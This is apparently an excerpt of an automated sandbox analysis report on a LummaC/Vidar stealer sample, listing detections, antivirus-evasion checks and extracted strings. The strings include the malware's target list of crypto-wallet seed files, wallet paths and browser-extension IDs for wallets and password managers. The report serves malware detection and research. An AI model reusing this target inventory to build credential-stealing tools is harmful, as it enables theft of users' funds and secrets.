                Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drBinary or memory string: AVP.exe
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Yara detected Vidar
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: keystore
